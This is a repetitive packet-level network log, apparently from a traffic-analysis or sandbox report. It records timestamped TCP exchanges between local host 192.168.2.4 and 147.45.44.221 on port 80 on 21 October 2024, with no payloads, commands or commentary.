                                                                                                                                                    Oct 21, 2024 08:47:29.737090111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737101078 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737124920 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737133980 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737157106 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737169027 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737190962 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737201929 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737222910 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737232924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737257004 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737265110 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737289906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737298012 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737324953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737330914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737354040 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737365961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737387896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737392902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737425089 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737430096 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737459898 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737468958 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737498999 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737517118 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737560034 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737566948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737612963 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737620115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737651110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737659931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737684965 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737690926 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737715006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737729073 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737746000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737755060 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737782001 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737792015 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737816095 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737826109 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737849951 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737860918 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737884045 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737888098 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737917900 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737930059 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737951994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.737961054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.737989902 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738009930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738054037 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738061905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738096952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738101006 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738132000 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738145113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738168001 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738171101 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738200903 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738205910 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738234997 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738241911 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738276958 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738286018 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738317966 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738327980 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738352060 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738369942 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738385916 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738403082 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738423109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738431931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738473892 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738475084 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738524914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738527060 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738568068 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738576889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738610029 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738626957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738646030 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738651037 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738689899 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738703012 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738749027 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738754988 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738786936 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738790989 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738821030 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738827944 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738854885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738867044 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738892078 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738894939 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738925934 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738934994 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738960028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738976002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.738991976 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.738996983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739026070 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739032984 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739058971 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739068031 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739094019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739099979 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739126921 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739145041 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739161015 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739172935 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739195108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739203930 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739229918 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739238024 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739263058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739270926 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739296913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739304066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739331007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739340067 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739365101 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739373922 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739407063 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739433050 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739466906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739479065 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739501953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739511013 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739536047 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739542961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739569902 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739578009 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739603996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739609957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739638090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739646912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739672899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.739681959 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.739718914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.854739904 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.854794979 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.854799986 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.854844093 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.854856014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.854897976 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.854904890 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.854945898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.854958057 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.854985952 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855003119 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855031013 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855056047 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855106115 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855109930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855149984 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855159998 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855201960 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855211020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855238914 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855259895 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855276108 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855292082 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855325937 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855339050 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855370045 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855380058 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855424881 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855477095 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855509996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855535984 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855545044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855566978 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855597973 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855597973 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855642080 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855668068 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855698109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855709076 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855739117 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855747938 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855792046 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855799913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855833054 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855838060 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855879068 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855885029 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855916977 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.855932951 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855956078 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.855969906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856002092 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856018066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856035948 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856045961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856074095 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856089115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856127024 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856142044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856175900 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856189966 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856215954 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856226921 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856256962 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856272936 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856303930 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856306076 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856352091 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856355906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856388092 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856398106 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856426001 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856431961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856455088 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856465101 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856494904 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856496096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856529951 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856534958 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856563091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856571913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856597900 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856607914 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856645107 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856648922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856688023 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856689930 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856726885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856731892 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856761932 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856781006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856817007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856832981 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856870890 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856870890 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856918097 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856923103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.856964111 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.856973886 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857004881 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857014894 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857038975 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857047081 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857079983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857089996 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857124090 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857134104 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857165098 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857177019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857213020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857223034 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857242107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857254028 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857280970 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857292891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857330084 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857336998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857372046 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857378960 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857414007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857422113 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857446909 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857467890 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857487917 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857497931 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857531071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857541084 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857564926 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857572079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857594967 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857614040 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857629061 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857637882 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857664108 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857673883 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857705116 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857712984 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857744932 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857757092 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857783079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857794046 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857825994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857841969 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857865095 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857876062 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857908964 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857923031 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857949018 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.857955933 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.857990026 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.858001947 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.858036041 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.858041048 CEST8049732147.45.44.221192.168.2.4
